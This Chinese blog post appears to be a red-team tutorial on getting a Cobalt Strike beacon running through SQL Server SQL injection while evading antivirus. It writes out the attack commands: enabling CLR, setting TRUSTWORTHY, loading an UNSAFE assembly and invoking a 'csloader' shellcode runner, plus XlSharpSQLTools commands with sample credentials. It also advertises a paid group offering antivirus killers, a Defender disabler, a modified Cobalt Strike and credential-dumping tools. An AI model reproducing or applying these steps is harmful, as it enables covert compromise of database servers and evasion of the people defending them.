【免杀】原来SQL注入也可以绕过杀软执行shellcode上线CoblatStrike

文摘   2024-11-18 11:11   黑龙江  

现在只对常读和星标的公众号才展示大图推送,建议大家能把星落安全团队设为星标”,否则可能就看不到了啦

背景介绍

     当我们遇到sqlserver数据库存在SQL注入漏洞时,或者获取到数据库账号密码通过数据库直连软件、但是目标机器上存在杀软会拦截powershell一句话上线cs。那有没有通过sql注入可以直接把payload.bin代码直接注入进去,然后执行上线CS。通过尝试发现是可以的。废话不多说,上教程。获取方式:连同一键kill360、 一键禁用defender、cobaltstrike4.9.1二开版本、免杀插件以及其他发布的工具都放在了内部星球里


使用方法

通过SQL注入的方式上线CS:

  1. 首先开启MSSQL CLR功能

sp_configure 'clr enabled', 1RECONFIGURE

2.需要导入 不安全的程序集

ALTER DATABASE master SET TRUSTWORTHY ON;

3. 利用SQL语句导入程序集(利用代码放到了星球内部)

CREATE ASSEMBLY [clr_pp] AUTHORIZATION [dbo] FROM  0xXXXXXXXX  WITH PERMISSION_SET = UNSAFE;

4 找到 程序集中的StoredProcedures类的ClrExec方法。

CREATE PROCEDURE [dbo].[ClrExec] @cmd NVARCHAR (MAX)  AS EXTERNAL NAME [CLR_module].[StoredProcedures].[ClrExec]

5. 首先需要通过base64对bin文件代码进行加密得到base64字符串,替换案例base64代码,然后按照以下格式执行命令即可上线CobaltStrike.

exec dbo.ExecCommand "csloader aGVsbHdvcmQ=";

通过直连数据库方式上线CS

利用到的工具:XlSharpSQLTools

1.首先启用clr

XlSharpSQLTools.exe 192.168.230.130 sa Aa123456 master enable_clr

2.然后安装clr功能

XlSharpSQLTools.exe 192.168.230.130 sa Aa123456 master install_clr

3.最后使用csloader指定payload.bin文件然后执行即可上线CoblatStrike。

XlSharpSQLTools.exe 192.168.230.130 sa Aa123456 master csloader D:\123\payload.bin


免杀效果

物理机360:没有拦截行为,成功上线CS

火绒:


圈子介绍

博主介绍


目前工作在某安全公司攻防实验室,一线攻击队选手。自2022-2024年总计参加过30+次省/市级攻防演练,擅长工具开发、免杀、代码审计、信息收集、内网渗透等安全技术。


目前已经更新的免杀内容:

  • 一键击溃360+核晶

  • 一键禁用defender

  •  CobaltStrike4.9.1二开 

  •  CobaltStrike免杀插件

  • 数据库直连工具免杀版

  • aspx文件自动上线cobaltbrike

  • jsp文件自动上线cobaltbrike

  • 哥斯拉免杀工具 XlByPassGodzilla

  • 冰蝎免杀工具 XlByPassBehinder

  • 冰蝎星落专版 xlbehinder

  • 正向代理工具 xleoreg

  • 反向代理工具xlfrc

  • 内网扫描工具 xlscan

  • CS免杀加载器 xlbpcs

  • Todesk/向日葵密码读取工具

  • 导出lsass内存工具 xlrls

  • 绕过WAF免杀工具 ByPassWAF

  • 等等...

目前星球已满200人,价格由208调整为218元(交个朋友啦),300名以后涨价至248元!


关注微信公众号后台回复“入群”,即可进入星落安全交流群!


   往期推荐   


1.【免杀】ASPX文件加载shellcode实现CobaltStrike上线


2.【免杀】JSP文件加载shellcode自动化实现CobaltStrike上线


3.【免杀】基于fscan 过360核晶、火绒的xlscan v1.2 介绍!


4.【免杀】CobaltStrike4.9.1二开 | 自破解 免杀 修复BUG


5. 【免杀】R3用户层一键击溃360+核晶



声明本文所涉及的技术、思路和工具仅用于安全测试和防御研究,切勿将其用于非法入侵或攻击他人系统以及盈利等目的,一切后果由操作者自行承担!!!


爱喝酒烫头的曹操
主要分享一些漏洞挖掘小技巧,代码审计、web安全、内网渗透以及一些实战案例、快速获得edu及cnvd漏洞报送证书小技巧。
 最新文章